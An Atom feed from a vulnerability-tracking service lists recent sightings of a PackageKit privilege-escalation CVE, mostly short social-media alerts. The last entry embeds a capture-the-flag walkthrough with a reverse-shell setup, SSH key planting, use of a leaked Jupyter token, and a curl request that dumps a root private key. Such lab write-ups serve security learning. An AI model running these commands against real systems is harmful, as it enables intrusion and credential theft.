<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://vulnerability.circl.lu/sightings/feed</id>
  <title>Most recent sightings.</title>
  <updated>2026-06-21T05:52:07.931989+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>info@circl.lu</email>
  </author>
  <link href="https://vulnerability.circl.lu" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the 10 most recent sightings.</subtitle>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/2da47309-262a-472b-bc39-f354b7ba0116/export</id>
    <title>2da47309-262a-472b-bc39-f354b7ba0116</title>
    <updated>2026-06-21T05:52:07.968436+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "2da47309-262a-472b-bc39-f354b7ba0116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "seen", "source": "https://t.me/GithubRedTeam/82559", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-41651\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a aexdyhaxor\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-03 02:57:46\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nPrivilege Escalation Vulnerability in PackageKit (TOCTOU Race Condition)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-03T03:00:04.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/2da47309-262a-472b-bc39-f354b7ba0116/export"/>
    <published>2026-05-03T03:00:04+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/c9198c67-29a3-4f3f-8e48-ae8be6c378d1/export</id>
    <title>c9198c67-29a3-4f3f-8e48-ae8be6c378d1</title>
    <updated>2026-06-21T05:52:07.968342+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "c9198c67-29a3-4f3f-8e48-ae8be6c378d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "seen", "source": "Telegram/jeht1hlPckgqiNrYmKXPjtYBl6Ckbf5A93GyXLRwxjRq970", "content": "", "creation_timestamp": "2026-05-03T09:00:04.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/c9198c67-29a3-4f3f-8e48-ae8be6c378d1/export"/>
    <published>2026-05-03T09:00:04+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/c01217e9-fcf0-4986-90b0-fac53e5cf4c7/export</id>
    <title>c01217e9-fcf0-4986-90b0-fac53e5cf4c7</title>
    <updated>2026-06-21T05:52:07.968247+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "c01217e9-fcf0-4986-90b0-fac53e5cf4c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "seen", "source": "https://bsky.app/profile/blogulluciprian.bsky.social/post/3mm5fwvyo522z", "content": "Alert\u0103 de securitate Linux: cum s\u0103 v\u0103 proteja\u021bi de vulnerabilitatea Pack2TheRoot\n\nO vulnerabilitate critic\u0103 cu un istoric de aproape 12 ani, numit\u0103 sugestiv Pack2TheRoot \u0219i \u00eenregistrat\u0103 oficial ca CVE-2026-41651, a zguduit recent lumea securit\u0103\u021bii...\n\nciprianbugulet.blogspot.com/2026/05/aler...", "creation_timestamp": "2026-05-18T17:34:38.621668Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/c01217e9-fcf0-4986-90b0-fac53e5cf4c7/export"/>
    <published>2026-05-18T17:34:38.621668+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/23536d04-da06-4d37-9667-eb54f4788e7c/export</id>
    <title>23536d04-da06-4d37-9667-eb54f4788e7c</title>
    <updated>2026-06-21T05:52:07.968150+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "23536d04-da06-4d37-9667-eb54f4788e7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mm5kizznyk2c", "content": "A critical race condition in PackageKit (CVE-2026-41651) opens #openSUSE and #SUSE systems to local privilege escalation. Read more -&amp;gt;  tinyurl.com/3tjvx4ax  #Security", "creation_timestamp": "2026-05-18T18:56:27.359377Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/23536d04-da06-4d37-9667-eb54f4788e7c/export"/>
    <published>2026-05-18T18:56:27.359377+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/c5f759f0-1951-41a3-ba13-d723eddc806d/export</id>
    <title>c5f759f0-1951-41a3-ba13-d723eddc806d</title>
    <updated>2026-06-21T05:52:07.968053+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "c5f759f0-1951-41a3-ba13-d723eddc806d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mm5kj4ndq22c", "content": "A critical race condition in PackageKit (CVE-2026-41651) opens #openSUSE and #SUSE systems to local privilege escalation. Read more -&amp;gt;  tinyurl.com/3tjvx4ax  #Security", "creation_timestamp": "2026-05-18T18:56:30.208826Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/c5f759f0-1951-41a3-ba13-d723eddc806d/export"/>
    <published>2026-05-18T18:56:30.208826+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/0c6c140b-54db-4516-8df3-221eebb79466/export</id>
    <title>0c6c140b-54db-4516-8df3-221eebb79466</title>
    <updated>2026-06-21T05:52:07.967949+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "0c6c140b-54db-4516-8df3-221eebb79466", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mm5kj7mbss2c", "content": "A critical race condition in PackageKit (CVE-2026-41651) opens #openSUSE and #SUSE systems to local privilege escalation. Read more -&amp;gt;  tinyurl.com/3tjvx4ax  #Security", "creation_timestamp": "2026-05-18T18:56:30.761174Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/0c6c140b-54db-4516-8df3-221eebb79466/export"/>
    <published>2026-05-18T18:56:30.761174+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/f5cfee9f-e147-46d9-bf0a-0ef4f11078c7/export</id>
    <title>f5cfee9f-e147-46d9-bf0a-0ef4f11078c7</title>
    <updated>2026-06-21T05:52:07.967840+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "f5cfee9f-e147-46d9-bf0a-0ef4f11078c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "seen", "source": "https://t.me/GithubRedTeam/84938", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-41651\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Lutfifakee-Project\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-20 07:48:18\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nExploit for CVE-2026-41651 - PackageKit TOCTOU Local Privilege Escalation (Pack2TheRoot)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-20T08:00:04.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/f5cfee9f-e147-46d9-bf0a-0ef4f11078c7/export"/>
    <published>2026-05-20T08:00:04+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/d7218c93-9250-439f-b7f8-68f76c0c8b9a/export</id>
    <title>d7218c93-9250-439f-b7f8-68f76c0c8b9a</title>
    <updated>2026-06-21T05:52:07.967732+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "d7218c93-9250-439f-b7f8-68f76c0c8b9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "published-proof-of-concept", "source": "Telegram/LRuVHO_NRtLslMv_pxl3JYoJM5ygIHd_ktikilExPtpHxGM", "content": "", "creation_timestamp": "2026-05-20T15:00:07.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/d7218c93-9250-439f-b7f8-68f76c0c8b9a/export"/>
    <published>2026-05-20T15:00:07+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/f2bc4b4d-fdae-42bd-b2a4-87d30eb1f966/export</id>
    <title>f2bc4b4d-fdae-42bd-b2a4-87d30eb1f966</title>
    <updated>2026-06-21T05:52:07.967598+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "f2bc4b4d-fdae-42bd-b2a4-87d30eb1f966", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "seen", "source": "https://bsky.app/profile/te9-dev.bsky.social/post/3mn2bx25fmb2g", "content": "CVE-2026-41651 | 52 stars | 15 forks\n\nTrending on te9.dev", "creation_timestamp": "2026-05-30T05:10:16.950677Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/f2bc4b4d-fdae-42bd-b2a4-87d30eb1f966/export"/>
    <published>2026-05-30T05:10:16.950677+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/081b6f10-e267-4987-bdce-5bb2d5df0ee7/export</id>
    <title>081b6f10-e267-4987-bdce-5bb2d5df0ee7</title>
    <updated>2026-06-21T05:52:07.965653+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "081b6f10-e267-4987-bdce-5bb2d5df0ee7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "seen", "source": "https://gist.github.com/Yann-P/597c2a31f6485fd849eb896411334a3f", "content": "\n1. nmap\n2. find port 80\n3. http page mentions mcp port 6274\n4. try access port 6274 in http\n5. shows mcpjam landing page\n6. find CVE and exploit https://raw.githubusercontent.com/alisster00/CVE-2026-23744-RCE/refs/heads/main/script.py\n7. reverse shell, `nc -l 10.10.15.61 4444`, `python mcpexploit.py --lport 4444 --lhost 10.10.15.61 -p 6274 devhub.htb`\n8. put autorized key, `echo 'ssh-ed25519 AAAAC3NzaC1l... htb' &amp;gt; ~/.ssh/authorized_keys`\n\n### Track 1: linpeas\n\n1. on host, `curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh &amp;gt; linpeas.sh`\n2. on host, `scp -i ~/.ssh/htb ./linpeas.sh mcp-dev@devhub.htb:~/`\n3. on target, run linpeas\n\nFindings\n\n```\nhttps://github.security.telekom.com/2026/04/pack2theroot-linux-local-privilege-escalation.html\nPackageKit version detected: 1.2.5\nVulnerable to CVE-2026-41651 (Pack2TheRoot) - PackageKit 1.2.5 is in the vulnerable range &amp;gt;=1.0.2 &amp;lt;=1.3.4\n```\n\nNot exploited for now.\n\n### Track 2: lateral movement to analyst\n\n10. ls /home, shows user \"analyst\"\n11. `ps aux | grep analyst`\n\n```\nanalyst     1077  0.0  2.4 182524 96256 ?        Ss   09:53   0:06 /home/analyst/jupyter-env/bin/python3 /home/analyst/jupyter-env/bin/jupyter-lab --ip=127.0.0.1 --port=8888 --no-browser --notebook-dir=/home/analyst/notebooks --ServerApp.token=a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7 --ServerApp.password= --ServerApp.allow_origin= --ServerApp.disable_check_xsrf=False\nroot        1082  0.0  0.7  37376 28788 ?        Ss   09:53   0:01 /home/analyst/jupyter-env/bin/python3 /opt/opsmcp/server.py\n```\n\n### Track 3: Jupyter\n\n1. Expose port 8888\n2. `ssh -i ~/.ssh/htb mcp-dev@devhub.htb -L 8888:localhost:8888 `\n3. token is leaked by ps aux above, set up new password \"yolo\" on localhost:8888 web ui.\n4. new terminal on jupyterlab (shell as analyst) -&amp;gt; `cat user.txt` -&amp;gt; `e73a08ded246c24...`\n\nLateral to analyst succeeded. User flag solved.\n\nAdditional: \n1. `mkdir ~/.ssh &amp;amp;&amp;amp; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NT.... htb' &amp;gt; ~/.ssh/authorized_keys`\n\n### Track 4: linpeas again\n\n1. `scp -i ~/.ssh/htb ./linpeas.sh analyst@devhub.htb:~/`\n\nFindings\n\n```\n\u2550\u2563 Services with writable paths? . jupyter.service: Writable service PATH entry '/home/analyst/jupyter-env/bin'\njupyter.service: /home/analyst/jupyter-env/bin/jupyter (from ExecStart=/home/analyst/jupyter-env/bin/jupyter lab --ip=127.0.0.1 --port=8888 --no-browser --notebook-dir=/home/analyst/notebooks --ServerApp.token='a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7' --ServerApp.password='' --ServerApp.allow_origin='' --ServerApp.disable_check_xsrf=False)\nopsmcp.service: Writable service PATH entry '/home/analyst/jupyter-env/bin'\n```\n\n\n### Exploration\n- processes ran as root\n\n```\nroot        1082  0.0  0.7  37376 28788 ?        Ss   09:53   0:02 /home/analyst/jupyter-env/bin/python3 /opt/opsmcp/server.py\n```\n\n- env: nothing.\n\n## Track 5: /opt/opsmcp/server.py runs as root\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nOPSMCP - Operations MCP Server\nInternal tool for system operations management\n\"\"\"\n\nfrom flask import Flask, jsonify, request\nimport os\n\napp = Flask(__name__)\n\n# API Key for authentication\nVALID_API_KEY = \"opsmcp_secret_key_4f5a6b7c8d9e0f1a\"\n\n...\n\ndef check_auth():\n    \"\"\"Check API key authentication\"\"\"\n    api_key = request.headers.get('X-API-Key', '')\n    return api_key == VALID_API_KEY\n\n...\n\n@app.route('/tools/call', methods=['POST'])\ndef call_tool():\n    if not check_auth():\n        return jsonify({\"error\": \"Unauthorized\", \"message\": \"Valid X-API-Key header required\"}), 401\n\n    data = request.get_json() or {}\n    tool_name = data.get('name', '')\n    args = data.get('arguments', {})\n\n    if not tool_name:\n        return jsonify({\"error\": \"Tool name required\"}), 400\n\n    if tool_name not in ALL_TOOLS:\n        return jsonify({\"error\": f\"Unknown tool: {tool_name}\"}), 404\n\n    # Execute tool\n    if tool_name == \"ops.system_status\":\n        ...\n\n\n    elif tool_name == \"ops._admin_dump\":\n        target = args.get('target', '')\n        confirm = args.get('confirm', False)\n\n        if not confirm:\n            return jsonify({\n                \"error\": \"Confirmation required\",\n                \"usage\": \"Set confirm=true to proceed\",\n                \"warning\": \"This dumps sensitive credentials\"\n            })\n\n        if target == \"ssh_keys\":\n            try:\n                with open('/root/.ssh/id_rsa', 'r') as f:\n                    key_data = f.read()\n                return jsonify({\n                    \"target\": \"ssh_keys\",\n                    \"root_private_key\": key_data,\n                    \"note\": \"Emergency recovery key dump\"\n                })\n            except Exception as e:\n                return jsonify({\n                    \"target\": \"ssh_keys\",\n                    \"error\": f\"Could not read key: {str(e)}\"\n                })\n\n        ...\n\nif __name__ == '__main__':\n    app.run(host='127.0.0.1', port=5000, debug=False)\n```\n\n\n1. There are tokens in cleartext\n2. In track 6 we have already seen that flask is owned by root: connection to this finding?\n3. Script analysis\n\t1. we probably have the passwords of analyst but not needed anymore\n\t2. This can leak /root/.ssh/id_rsa !\n4. we want to expose this, call with `tool_name=ops._admin_dump` and `target == \"ssh_keys\":`\n\t1. expose `ssh -i ~/.ssh/htb analyst@devhub.htb -L 5000:localhost:5000`\n\t2. try\n\t\n```\n\tcurl localhost:5000\n{\"auth\":\"Required - X-API-Key header\",\"endpoints\":[\"/tools/list\",\"/tools/call\",\"/health\"],\"server\":\"OPSMCP\",\"status\":\"operational\",\"version\":\"2.1.0\"}\n```\n\n```\n curl -s -X POST \\\n    'http://localhost:5000/tools/call' \\\n    -H 'X-API-Key: opsmcp_secret_key_4f5a6b7c8d9e0f1a' \\\n  -H \"Content-Type: application/json\" -d '{\"name\": \"ops._admin_dump\", \"arguments\": {\"confirm\": true, \"target\": \"ssh_keys\"}}'\n```\n\nreturns the root ssh key.\n\n1. vim ~/.ssh/htb2\n2. chmod 600 ~/.ssh/htb2\n3. ssh -i ~/.ssh/htb2 root@devhub.htb\n4. cat root.txt\n\nSolved\n\n## Track 6 : writable  /home/analyst/jupyter-env/bin found by linpeas\n\n1. \n\n```\n   analyst@devhub:~$ ls -Rl  /home/analyst/jupyter-env/bin\n/home/analyst/jupyter-env/bin:\n-rw-r--r-- 1 analyst analyst 2008 Jan 22 15:03 activate\n-rw-r--r-- 1 analyst analyst  934 Jan 22 15:03 activate.csh\n-rw-r--r-- 1 analyst analyst 2210 Jan 22 15:03 activate.fish\n-rw-r--r-- 1 analyst analyst 9033 Jan 22 15:03 Activate.ps1\n-rwxr-xr-x 1 analyst analyst  211 Jan 22 15:06 debugpy\n-rwxr-xr-x 1 analyst analyst  217 Jan 22 15:06 debugpy-adapter\n-rwxr-xr-x 1 analyst analyst  210 Jan 22 15:06 f2py\n-rwxr-xr-x 1 root    root     202 Mar 16 21:28 flask\n-rwxr-xr-x 1 analyst analyst  211 Jan 22 15:06 fonttools\n```\n\nflask is owned by root\n\nTrack abandoned\n\n", "creation_timestamp": "2026-06-18T12:30:28.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/081b6f10-e267-4987-bdce-5bb2d5df0ee7/export"/>
    <published>2026-06-18T12:30:28+00:00</published>
  </entry>
</feed>
